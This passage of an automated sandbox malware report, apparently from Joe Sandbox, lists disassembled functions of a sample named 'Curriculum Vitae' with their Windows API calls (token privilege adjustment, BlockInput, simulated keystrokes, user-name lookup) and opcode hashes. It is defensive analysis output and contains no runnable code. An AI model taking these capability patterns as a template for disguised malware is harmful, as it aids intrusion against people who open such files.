                      • SetErrorMode.KERNEL32(00000000), ref: 00DA52A1
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ErrorMode$DiskFreeSpace
                      • String ID:
                      • API String ID: 1682464887-0
                      • Opcode ID: fc8415c66d5b03ed5ff3763e7227a8191df09a2f078fe831b99404a08fd55913
                      • Instruction ID: 398286499e001d3ca4399991279f4def0ceb3241ece86db662479908d290308f
                      • Opcode Fuzzy Hash: fc8415c66d5b03ed5ff3763e7227a8191df09a2f078fe831b99404a08fd55913
                      • Instruction Fuzzy Hash: 1E318E75A10609DFDB00DF54D884FADBBB4FF49314F088099E809AB366CB31E845CBA0
                      Function 00D916C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D4FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00D50668
                        • Part of subcall function 00D4FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00D50685
                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00D9170D
                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00D9173A
                      • GetLastError.KERNEL32 ref: 00D9174A
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                      • String ID:
                      • API String ID: 577356006-0
                      • Opcode ID: e3f314b8a45e8f7afe4e162f86df43ce51e7cfba3f8a4f53c7b9245bbeb59360
                      • Instruction ID: 994b6365e1d97a0b57059fab20b2a97a81b341f6305d93ac68de8a2f56bc69ad
                      • Opcode Fuzzy Hash: e3f314b8a45e8f7afe4e162f86df43ce51e7cfba3f8a4f53c7b9245bbeb59360
                      • Instruction Fuzzy Hash: 861191B2914306AFE7189F54EC86D6AB7B9EF44714B24852EE05697251EB70FC418A30
                      Function 00D9D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                      Download Yara Rule
                      APIs
                      • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00D9D608
                      • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00D9D645
                      • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00D9D650
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: CloseControlCreateDeviceFileHandle
                      • String ID:
                      • API String ID: 33631002-0
                      • Opcode ID: dc6e0c0c646c936945a27e0a3f1b5b019ba0b18d2f61c5ab20ee856fa5368956
                      • Instruction ID: e48aa8173d3a69e25a30f83e3f22c6676ef8543cc90abd56b88ff43053b5009e
                      • Opcode Fuzzy Hash: dc6e0c0c646c936945a27e0a3f1b5b019ba0b18d2f61c5ab20ee856fa5368956
                      • Instruction Fuzzy Hash: 17115E75E05328BFDB108F95EC45FAFBBBCEB45B50F108115F908E7290D6704A058BA1
                      Function 00D91663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                      Download Yara Rule
                      APIs
                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00D9168C
                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00D916A1
                      • FreeSid.ADVAPI32(?), ref: 00D916B1
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: AllocateCheckFreeInitializeMembershipToken
                      • String ID:
                      • API String ID: 3429775523-0
                      • Opcode ID: 715e9c2fa835f9fb0621f944162ec73fa3238669400ca8b2ff7bbfb5bd93c2e4
                      • Instruction ID: 789c65d7f3e55ea1082af7488768653fe3d4124d233af94bbfa6f394c54bceb9
                      • Opcode Fuzzy Hash: 715e9c2fa835f9fb0621f944162ec73fa3238669400ca8b2ff7bbfb5bd93c2e4
                      • Instruction Fuzzy Hash: D2F0F47595030AFBDF00DFE49C89EAEBBBCFB08604F504565EA01E2281E774AA449A64
                      Function 00D54CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • GetCurrentProcess.KERNEL32(00D628E9,?,00D54CBE,00D628E9,00DF88B8,0000000C,00D54E15,00D628E9,00000002,00000000,?,00D628E9), ref: 00D54D09
                      • TerminateProcess.KERNEL32(00000000,?,00D54CBE,00D628E9,00DF88B8,0000000C,00D54E15,00D628E9,00000002,00000000,?,00D628E9), ref: 00D54D10
                      • ExitProcess.KERNEL32 ref: 00D54D22
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Process$CurrentExitTerminate
                      • String ID:
                      • API String ID: 1703294689-0
                      • Opcode ID: 2599d36ee0e73594b42d86193707d737915403d046008a2598cdb85c1cb56601
                      • Instruction ID: e0c49c430d5363a34174e80aa8cb2cf7552877342df65d53885ab5acc1dfa720
                      • Opcode Fuzzy Hash: 2599d36ee0e73594b42d86193707d737915403d046008a2598cdb85c1cb56601
                      • Instruction Fuzzy Hash: 6CE0B63141024AABCF11AF54EE09E583B79FB41796B145019FD19CB222CB36DD86CAB1
                      Function 00D6C2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID:
                      • String ID: /
                      • API String ID: 0-2043925204
                      • Opcode ID: 4432e16a5f01e4b5bd9274bbf856b6be2dac45bef3c4c846e7b28321429968fc
                      • Instruction ID: e06487398c8b575f31715cdcb77afd4869329fda32b542f01baf8a77d75116f2
                      • Opcode Fuzzy Hash: 4432e16a5f01e4b5bd9274bbf856b6be2dac45bef3c4c846e7b28321429968fc
                      • Instruction Fuzzy Hash: 38413872500219AFCB209FB9CC88DBB7778EB84314F144269F945C7280E631AD418B74
                      Function 00D8D27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                      Download Yara Rule
                      APIs
                      • GetUserNameW.ADVAPI32(?,?), ref: 00D8D28C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: NameUser
                      • String ID: X64
                      • API String ID: 2645101109-893830106
                      • Opcode ID: 3b7644b5442cf2f6ddcb24d48d97712008226116ba3d20bb7260b4c01fcfac3f
                      • Instruction ID: a59fb58904b1025c3b822122c4131b0b0143e86504e90b093eaafc769e4028b5
                      • Opcode Fuzzy Hash: 3b7644b5442cf2f6ddcb24d48d97712008226116ba3d20bb7260b4c01fcfac3f
                      • Instruction Fuzzy Hash: 2DD0C9B481111EEBCB90DB90EC88DD9B37CBB04305F100151F146E2140D73095489F20
                      Function 00D5CAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                      • Instruction ID: e037586c8730abdc22c4a6d3867bc961f1d146e3a52f250bc69fb982c3633ce2
                      • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                      • Instruction Fuzzy Hash: 08021C71E112199FDF14CFA9C8806ADBBF1EF48315F29916AEC19E7380D731AA45CB90
                      Function 00DA68EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                      Download Yara Rule
                      APIs
                      • FindFirstFileW.KERNEL32(?,?), ref: 00DA6918
                      • FindClose.KERNEL32(00000000), ref: 00DA6961
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Find$CloseFileFirst
                      • String ID:
                      • API String ID: 2295610775-0
                      • Opcode ID: bdd0d37666b50455eab2dc764102581946ec9c29a0310110d51665d27ff9e308
                      • Instruction ID: da7031f89425952605e393e282c3c7b5776d403d99af8db3459309cf29d960e1
                      • Opcode Fuzzy Hash: bdd0d37666b50455eab2dc764102581946ec9c29a0310110d51665d27ff9e308
                      • Instruction Fuzzy Hash: 50118E756146019FC710DF29D488A16BBE5EF89328F18C699E5698F7A2CB30EC05CFA1
                      Function 00DA37B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00DB4891,?,?,00000035,?), ref: 00DA37E4
                      • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00DB4891,?,?,00000035,?), ref: 00DA37F4
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ErrorFormatLastMessage
                      • String ID:
                      • API String ID: 3479602957-0
                      • Opcode ID: 831e05b0efc689e469c8ff66807968cb33bafe219e5413b76bbaa26e26201697
                      • Instruction ID: 263e5b1e2fda1e636a2c2d37e832f82ae83869c2db9e03e4736b1169b20e17fb
                      • Opcode Fuzzy Hash: 831e05b0efc689e469c8ff66807968cb33bafe219e5413b76bbaa26e26201697
                      • Instruction Fuzzy Hash: 7DF0E5B160432A2AE72057669C4DFEB7AAEEFC5761F000265F609D2291D9A09904C7B0
                      Function 00D9B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                      Download Yara Rule
                      APIs
                      • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00D9B25D
                      • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 00D9B270
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: InputSendkeybd_event
                      • String ID:
                      • API String ID: 3536248340-0
                      • Opcode ID: 2f3b2ae847025d73b8c8afb7f41b52d9bf3e3890c551e54d29000630be5d39a8
                      • Instruction ID: 7e6d7a90388c74f9693b442b4ad1218dd75a93b213cdee0ab891bd845405a796
                      • Opcode Fuzzy Hash: 2f3b2ae847025d73b8c8afb7f41b52d9bf3e3890c551e54d29000630be5d39a8
                      • Instruction Fuzzy Hash: 9EF01D7181424EABDF059FA0D805BAE7BB4FF04315F04901AF955E6191C379D6119FA4
                      Function 00D910BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                      Download Yara Rule
                      APIs
                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00D911FC), ref: 00D910D4
                      • CloseHandle.KERNEL32(?,?,00D911FC), ref: 00D910E9
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: AdjustCloseHandlePrivilegesToken
                      • String ID:
                      • API String ID: 81990902-0
                      • Opcode ID: 48f3eff0ed078e7408939469c8d94fb53ecae126ebe2cc1eb0d6affe5404f8c3
                      • Instruction ID: 45963c823f4870070e89e5ab03646ebf6417b5023fb225f01638753c61756c71
                      • Opcode Fuzzy Hash: 48f3eff0ed078e7408939469c8d94fb53ecae126ebe2cc1eb0d6affe5404f8c3
                      • Instruction Fuzzy Hash: 74E0BF72014752AFE7252B51FC05E7777A9FB04311B14882DF5AA805B1DB626C90EB70
                      Function 00D6676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00D66766,?,?,00000008,?,?,00D6FEFE,00000000), ref: 00D66998
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ExceptionRaise
                      • String ID:
                      • API String ID: 3997070919-0
                      • Opcode ID: 8fc41c19754850513b1be5bfc6bf97c82b6a9a86ba716eacf5a2d10e992e6e07
                      • Instruction ID: eb5d54e2b45fdb7027a30e333f51d0a428fbdb63753fa597b5f0f328d127e7e9
                      • Opcode Fuzzy Hash: 8fc41c19754850513b1be5bfc6bf97c82b6a9a86ba716eacf5a2d10e992e6e07
                      • Instruction Fuzzy Hash: 71B139316106099FD719CF28C48AB657BE0FF45364F298659E8D9CF2E2C335E991CB50
                      Function 00D4B119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID: 0-3916222277
                      • Opcode ID: d12cf2cb093589d2861f309fb62cf60026ea84d6ad137b19fa638bb6e1773ade
                      • Instruction ID: cdf354c4c9ab20db9d22001e55c8f41f250505b1ee30804c5bb303519c8fb385
                      • Opcode Fuzzy Hash: d12cf2cb093589d2861f309fb62cf60026ea84d6ad137b19fa638bb6e1773ade
                      • Instruction Fuzzy Hash: 2F125F759002299FCB24DF58C880AEEB7B5FF58710F54819AE849EB255DB30DE81DFA0
                      Function 00DAEAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                      Download Yara Rule
                      APIs
                      • BlockInput.USER32(00000001), ref: 00DAEABD
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: BlockInput
                      • String ID:
                      • API String ID: 3456056419-0
                      • Opcode ID: cdf24aa6a1e2ad645310bc6fdc0a069f98c55f17875962f55183550cc6420960
                      • Instruction ID: 401b57254ac0de1053a1f0571bb8be4925d96f7e2043cbd5bf9e4cc6debe7144
                      • Opcode Fuzzy Hash: cdf24aa6a1e2ad645310bc6fdc0a069f98c55f17875962f55183550cc6420960
                      • Instruction Fuzzy Hash: B7E01A362102059FC710EF59D804E9AB7E9EF99760F00841AFD49DB361DA70EC408BB0
                      Function 00D509D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                      Download Yara Rule
                      APIs
                      • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,00D503EE), ref: 00D509DA
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ExceptionFilterUnhandled
                      • String ID:
                      • API String ID: 3192549508-0
                      • Opcode ID: b6fb0aea50fb75a352888f11e09863ed034116eccd9ec4b4cedc53a21f0d6347
                      • Instruction ID: 102dc5c64e7b91e35cfce61cbff87efde648d7fe46629f89a7ce36904216667b
                      • Opcode Fuzzy Hash: b6fb0aea50fb75a352888f11e09863ed034116eccd9ec4b4cedc53a21f0d6347
                      • Instruction Fuzzy Hash:
                      Function 00D5781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID:
                      • String ID: 0
                      • API String ID: 0-4108050209
                      • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                      • Instruction ID: 0e5c4448627b60c5ffad84580a11fb1e656622b87d6b42bb3590a06e41959401
                      • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                      • Instruction Fuzzy Hash: B351577160C6055BDF388568A85DBBE6B8ADB12303F3C0509DC86D7282CA15EE0DEB72
                      Function 00DA2046 Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID:
                      • String ID: 0&
                      • API String ID: 0-2523485602
                      • Opcode ID: 79cfe5ef6a9365fcbebad8699be295f917f2b060ab7e837123d33ca9e1fd0fac
                      • Instruction ID: c7093b0dc5a87818c8742ebac4b2aac73794a1653a26bfb304bd7a671272b996
                      • Opcode Fuzzy Hash: 79cfe5ef6a9365fcbebad8699be295f917f2b060ab7e837123d33ca9e1fd0fac
                      • Instruction Fuzzy Hash: 5621EB323205118BD728CF7AC81367E73E5A754310F18862EE4A7D37D0DE36A944C794
                      Function 00D66DD9 Relevance: .6, Instructions: 637COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
